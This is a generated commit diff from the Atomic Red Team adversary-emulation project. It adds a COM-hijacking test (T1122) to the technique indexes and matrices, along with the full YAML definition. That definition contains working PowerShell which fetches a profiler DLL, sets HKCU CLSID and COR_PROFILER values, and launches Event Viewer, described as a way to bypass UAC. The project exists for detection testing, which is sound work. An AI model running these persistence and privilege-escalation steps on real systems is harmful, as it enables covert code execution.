Generate docs from job=validate_atomics_generate_docs branch=master

This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-05-02 00:36:51 +00:00
parent 9b73020cee
commit 2bde901e95
10 changed files with 317 additions and 10 deletions
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
+2
@@ -14,6 +14,7 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode)
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store)
persistence,T1176,Browser Extensions,3,Firefox
persistence,T1042,Change Default File Association,1,Change Default File Association
persistence,T1122,Component Object Model Hijacking,1,COM Hijack Leveraging .NET profiler DLL
persistence,T1136,Create Account,1,Create a user account on a Linux system
persistence,T1136,Create Account,2,Create a user account on a MacOS system
persistence,T1136,Create Account,3,Create a new user in a command prompt
@@ -103,6 +104,7 @@ defense-evasion,T1146,Clear Command History,6,Clear history of a bunch of shells
defense-evasion,T1500,Compile After Delivery,1,Compile After Delivery using csc.exe
defense-evasion,T1223,Compiled HTML File,1,Compiled HTML Help Local Payload
defense-evasion,T1223,Compiled HTML File,2,Compiled HTML Help Remote Payload
defense-evasion,T1122,Component Object Model Hijacking,1,COM Hijack Leveraging .NET profiler DLL
defense-evasion,T1090,Connection Proxy,1,Connection Proxy
defense-evasion,T1090,Connection Proxy,2,portproxy reg key
defense-evasion,T1196,Control Panel Items,1,Control Panel Items
@@ -13,6 +13,7 @@ defense-evasion,T1191,CMSTP,2,CMSTP Executing UAC Bypass
defense-evasion,T1500,Compile After Delivery,1,Compile After Delivery using csc.exe
defense-evasion,T1223,Compiled HTML File,1,Compiled HTML Help Local Payload
defense-evasion,T1223,Compiled HTML File,2,Compiled HTML Help Remote Payload
defense-evasion,T1122,Component Object Model Hijacking,1,COM Hijack Leveraging .NET profiler DLL
defense-evasion,T1090,Connection Proxy,2,portproxy reg key
defense-evasion,T1196,Control Panel Items,1,Control Panel Items
defense-evasion,T1207,DCShadow,1,DCShadow - Mimikatz
@@ -166,6 +167,7 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode)
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store)
persistence,T1176,Browser Extensions,3,Firefox
persistence,T1042,Change Default File Association,1,Change Default File Association
persistence,T1122,Component Object Model Hijacking,1,COM Hijack Leveraging .NET profiler DLL
persistence,T1136,Create Account,3,Create a new user in a command prompt
persistence,T1136,Create Account,4,Create a new user in PowerShell
persistence,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll
+4 -2
@@ -27,7 +27,8 @@
- [T1042 Change Default File Association](../../T1042/T1042.md)
- Atomic Test #1: Change Default File Association [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](../../T1122/T1122.md)
- Atomic Test #1: COM Hijack Leveraging .NET profiler DLL [windows]
- [T1136 Create Account](../../T1136/T1136.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
@@ -180,7 +181,8 @@
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](../../T1122/T1122.md)
- Atomic Test #1: COM Hijack Leveraging .NET profiler DLL [windows]
- [T1090 Connection Proxy](../../T1090/T1090.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- Atomic Test #2: portproxy reg key [windows]
@@ -23,7 +23,8 @@
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](../../T1122/T1122.md)
- Atomic Test #1: COM Hijack Leveraging .NET profiler DLL [windows]
- [T1090 Connection Proxy](../../T1090/T1090.md)
- Atomic Test #2: portproxy reg key [windows]
- [T1196 Control Panel Items](../../T1196/T1196.md)
@@ -265,7 +266,8 @@
- [T1042 Change Default File Association](../../T1042/T1042.md)
- Atomic Test #1: Change Default File Association [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1122 Component Object Model Hijacking](../../T1122/T1122.md)
- Atomic Test #1: COM Hijack Leveraging .NET profiler DLL [windows]
- [T1136 Create Account](../../T1136/T1136.md)
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
+2 -2
@@ -12,8 +12,8 @@
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1500/T1500.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [Pass the Ticket](../../T1097/T1097.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | [Emond](../../T1519/T1519.md) | [Compiled HTML File](../../T1223/T1223.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Remote Desktop Protocol](../../T1076/T1076.md) | [Email Collection](../../T1114/T1114.md) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1042/T1042.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](../../T1179/T1179.md) | [Password Policy Discovery](../../T1201/T1201.md) | [Remote File Copy](../../T1105/T1105.md) | [Input Capture](../../T1056/T1056.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | [InstallUtil](../../T1118/T1118.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](../../T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File System Permissions Weakness](../../T1044/T1044.md) | [Connection Proxy](../../T1090/T1090.md) | [Input Prompt](../../T1141/T1141.md) | [Permission Groups Discovery](../../T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](../../T1113/T1113.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
| | [InstallUtil](../../T1118/T1118.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1122/T1122.md) | [Input Capture](../../T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1122/T1122.md) | [File System Permissions Weakness](../../T1044/T1044.md) | [Connection Proxy](../../T1090/T1090.md) | [Input Prompt](../../T1141/T1141.md) | [Permission Groups Discovery](../../T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](../../T1113/T1113.md) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
| | [Launchctl](../../T1152/T1152.md) | [Create Account](../../T1136/T1136.md) | [Hooking](../../T1179/T1179.md) | [Control Panel Items](../../T1196/T1196.md) | [Kerberoasting](../../T1208/T1208.md) | [Process Discovery](../../T1057/T1057.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Local Job Scheduling](../../T1168/T1168.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Image File Execution Options Injection](../../T1183/T1183.md) | [DCShadow](../../T1207/T1207.md) | [Keychain](../../T1142/T1142.md) | [Query Registry](../../T1012/T1012.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | [Mshta](../../T1170/T1170.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1160/T1160.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Remote Access Tools](../../T1219/T1219.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+2 -2
@@ -10,9 +10,9 @@
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Compile After Delivery](../../T1500/T1500.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | [Pass the Ticket](../../T1097/T1097.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1223/T1223.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Remote Desktop Protocol](../../T1076/T1076.md) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](../../T1179/T1179.md) | [Password Policy Discovery](../../T1201/T1201.md) | [Remote File Copy](../../T1105/T1105.md) | [Email Collection](../../T1114/T1114.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1042/T1042.md) | [File System Permissions Weakness](../../T1044/T1044.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](../../T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](../../T1056/T1056.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1042/T1042.md) | [File System Permissions Weakness](../../T1044/T1044.md) | [Component Object Model Hijacking](../../T1122/T1122.md) | [Input Capture](../../T1056/T1056.md) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Input Capture](../../T1056/T1056.md) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1118/T1118.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hooking](../../T1179/T1179.md) | [Connection Proxy](../../T1090/T1090.md) | [Input Prompt](../../T1141/T1141.md) | [Permission Groups Discovery](../../T1069/T1069.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1183/T1183.md) | [Control Panel Items](../../T1196/T1196.md) | [Kerberoasting](../../T1208/T1208.md) | [Process Discovery](../../T1057/T1057.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](../../T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1122/T1122.md) | [Image File Execution Options Injection](../../T1183/T1183.md) | [Control Panel Items](../../T1196/T1196.md) | [Kerberoasting](../../T1208/T1208.md) | [Process Discovery](../../T1057/T1057.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screen Capture](../../T1113/T1113.md) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Mshta](../../T1170/T1170.md) | [Create Account](../../T1136/T1136.md) | [New Service](../../T1050/T1050.md) | [DCShadow](../../T1207/T1207.md) | LLMNR/NBT-NS Poisoning and Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Query Registry](../../T1012/T1012.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
| | [PowerShell](../../T1086/T1086.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Parent PID Spoofing](../../T1502/T1502.md) | [DLL Search Order Hijacking](../../T1038/T1038.md) | [Network Sniffing](../../T1040/T1040.md) | [Remote System Discovery](../../T1018/T1018.md) | Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | [Regsvcs/Regasm](../../T1121/T1121.md) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1073/T1073.md) | [Password Filter DLL](../../T1174/T1174.md) | [Security Software Discovery](../../T1063/T1063.md) | [Windows Admin Shares](../../T1077/T1077.md) | | | [Remote Access Tools](../../T1219/T1219.md) | [System Shutdown/Reboot](../../T1529/T1529.md) |
+232
@@ -1098,6 +1098,122 @@ persistence:
cleanup_command: 'assoc .hta=htafile
'
T1122:
technique:
x_mitre_permissions_required:
- User
x_mitre_data_sources:
- Windows Registry
- DLL monitoring
- Loaded DLLs
name: Component Object Model Hijacking
description: 'The Component Object Model (COM) is a system within Windows to
enable interaction between software components through the operating system.
(Citation: Microsoft Component Object Model) Adversaries can use this system
to insert malicious code that can be executed in place of legitimate software
through hijacking the COM references and relationships as a means for persistence.
Hijacking a COM object requires a change in the Windows Registry to replace
a reference to a legitimate system component which may cause that component
to not work when executed. When that system component is executed through
normal system operation the adversary''s code will be executed instead. (Citation:
GDATA COM Hijacking) An adversary is likely to hijack objects that are used
frequently enough to maintain a consistent level of persistence, but are unlikely
to break noticeable functionality within the system as to avoid system instability
that could lead to detection.'
id: attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69
modified: '2019-04-18T16:41:28.889Z'
x_mitre_platforms:
- Windows
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
type: attack-pattern
x_mitre_detection: 'There are opportunities to detect COM hijacking by searching
for Registry references that have been replaced and through Registry operations
replacing know binary paths with unknown paths. Even though some third party
applications define user COM objects, the presence of objects within <code>HKEY_CURRENT_USER\Software\Classes\CLSID\</code>
may be anomalous and should be investigated since user objects will be loaded
prior to machine objects in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\</code>.
(Citation: Endgame COM Hijacking) Registry entries for existing COM objects
may change infrequently. When an entry with a known good path and binary is
replaced or changed to an unusual value to point to an unknown binary in a
new location, then it may indicate suspicious behavior and should be investigated.
Likewise, if software DLL loads are collected and analyzed, any unusual DLL
load that can be correlated with a COM object Registry modification may indicate
COM hijacking has been performed.'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_contributors:
- ENDGAME
created: '2017-05-31T21:31:33.979Z'
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
external_references:
- external_id: T1122
source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1122
- source_name: Microsoft Component Object Model
description: Microsoft. (n.d.). The Component Object Model. Retrieved August
18, 2016.
url: https://msdn.microsoft.com/library/ms694363.aspx
- source_name: GDATA COM Hijacking
description: 'G DATA. (2014, October). COM Object hijacking: the discreet
way of persistence. Retrieved August 13, 2016.'
url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence
- source_name: Endgame COM Hijacking
description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting
Persistence & Evasion with the COM. Retrieved September 15, 2016.'
url: https://www.endgame.com/blog/how-hunt-detecting-persistence-evasion-com
x_mitre_defense_bypassed:
- Autoruns Analysis
identifier: T1122
atomic_tests:
- name: COM Hijack Leveraging .NET profiler DLL
description: "Creates environment variables and CLSID to enable a .NET profiler.
The profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by
the Event Viewer process. Additionally, the profiling DLL will inherit the
integrity level of Event Viewer bypassing UAC and executing `notepad.exe`
with high integrity. If the account used is not a local administrator the
profiler DLL will still execute each time the CLR is loaded by a process,
however, the notepad process will not execute with high integrity. \n"
supported_platforms:
- windows
input_arguments:
file_name:
description: profiler DLL
type: Path
default: PathToAtomicsFolder\T1122\bin\T1122x64.dll
clsid_guid:
description: custom clsid guid
type: String
default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
dependency_executor_name: powershell
dependencies:
- description: "#{file_name} must be present"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}'
get_prereq_command: |-
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
executor:
name: powershell
elevation_required: false
command: |
Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
Start-Sleep 5
cleanup_command: |-
Write-Host "Removing registry keys" -ForegroundColor Cyan
Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
T1136:
technique:
x_mitre_permissions_required:
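Review bot: the `-Value #{file_name}` argument is unquoted in `New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null` and again in the `COR_PROFILER_PATH` line of the executor, while the same argument is quoted as `"#{file_name}"` in `get_prereq_command`; if `PathToAtomicsFolder` resolves to a directory containing spaces, PowerShell parses the path as several arguments and the command fails or writes a truncated registry value, so both occurrences should be quoted. Two smaller points in the same block: the test description names the profiler DLL `atomicNotepad.dll` but the `file_name` default is `PathToAtomicsFolder\T1122\bin\T1122x64.dll`, so one of the two names should be corrected to match the other; and the `Write-Host` message prints `HKCU:Software\Classes\CLSID\...` without the backslash after the drive that the actual `New-Item` path uses. The cleanup removes the CLSID key and the three `HKCU:\Environment` values but leaves the `MMC.EXE` instance started by `START MMC.EXE EVENTVWR.MSC` running with the profiler loaded; a `Stop-Process` for that process would make the cleanup complete.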
@@ -6308,6 +6424,122 @@ defense-evasion:
command: 'hh.exe #{remote_chm_file}
'
T1122:
technique:
x_mitre_permissions_required:
- User
x_mitre_data_sources:
- Windows Registry
- DLL monitoring
- Loaded DLLs
name: Component Object Model Hijacking
description: 'The Component Object Model (COM) is a system within Windows to
enable interaction between software components through the operating system.
(Citation: Microsoft Component Object Model) Adversaries can use this system
to insert malicious code that can be executed in place of legitimate software
through hijacking the COM references and relationships as a means for persistence.
Hijacking a COM object requires a change in the Windows Registry to replace
a reference to a legitimate system component which may cause that component
to not work when executed. When that system component is executed through
normal system operation the adversary''s code will be executed instead. (Citation:
GDATA COM Hijacking) An adversary is likely to hijack objects that are used
frequently enough to maintain a consistent level of persistence, but are unlikely
to break noticeable functionality within the system as to avoid system instability
that could lead to detection.'
id: attack-pattern--9b52fca7-1a36-4da0-b62d-da5bd83b4d69
modified: '2019-04-18T16:41:28.889Z'
x_mitre_platforms:
- Windows
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
type: attack-pattern
x_mitre_detection: 'There are opportunities to detect COM hijacking by searching
for Registry references that have been replaced and through Registry operations
replacing know binary paths with unknown paths. Even though some third party
applications define user COM objects, the presence of objects within <code>HKEY_CURRENT_USER\Software\Classes\CLSID\</code>
may be anomalous and should be investigated since user objects will be loaded
prior to machine objects in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\</code>.
(Citation: Endgame COM Hijacking) Registry entries for existing COM objects
may change infrequently. When an entry with a known good path and binary is
replaced or changed to an unusual value to point to an unknown binary in a
new location, then it may indicate suspicious behavior and should be investigated.
Likewise, if software DLL loads are collected and analyzed, any unusual DLL
load that can be correlated with a COM object Registry modification may indicate
COM hijacking has been performed.'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_contributors:
- ENDGAME
created: '2017-05-31T21:31:33.979Z'
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
external_references:
- external_id: T1122
source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1122
- source_name: Microsoft Component Object Model
description: Microsoft. (n.d.). The Component Object Model. Retrieved August
18, 2016.
url: https://msdn.microsoft.com/library/ms694363.aspx
- source_name: GDATA COM Hijacking
description: 'G DATA. (2014, October). COM Object hijacking: the discreet
way of persistence. Retrieved August 13, 2016.'
url: https://blog.gdatasoftware.com/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence
- source_name: Endgame COM Hijacking
description: 'Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting
Persistence & Evasion with the COM. Retrieved September 15, 2016.'
url: https://www.endgame.com/blog/how-hunt-detecting-persistence-evasion-com
x_mitre_defense_bypassed:
- Autoruns Analysis
identifier: T1122
atomic_tests:
- name: COM Hijack Leveraging .NET profiler DLL
description: "Creates environment variables and CLSID to enable a .NET profiler.
The profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by
the Event Viewer process. Additionally, the profiling DLL will inherit the
integrity level of Event Viewer bypassing UAC and executing `notepad.exe`
with high integrity. If the account used is not a local administrator the
profiler DLL will still execute each time the CLR is loaded by a process,
however, the notepad process will not execute with high integrity. \n"
supported_platforms:
- windows
input_arguments:
file_name:
description: profiler DLL
type: Path
default: PathToAtomicsFolder\T1122\bin\T1122x64.dll
clsid_guid:
description: custom clsid guid
type: String
default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
dependency_executor_name: powershell
dependencies:
- description: "#{file_name} must be present"
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}'
get_prereq_command: |-
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
executor:
name: powershell
elevation_required: false
command: |
Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
Start-Sleep 5
cleanup_command: |-
Write-Host "Removing registry keys" -ForegroundColor Cyan
Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
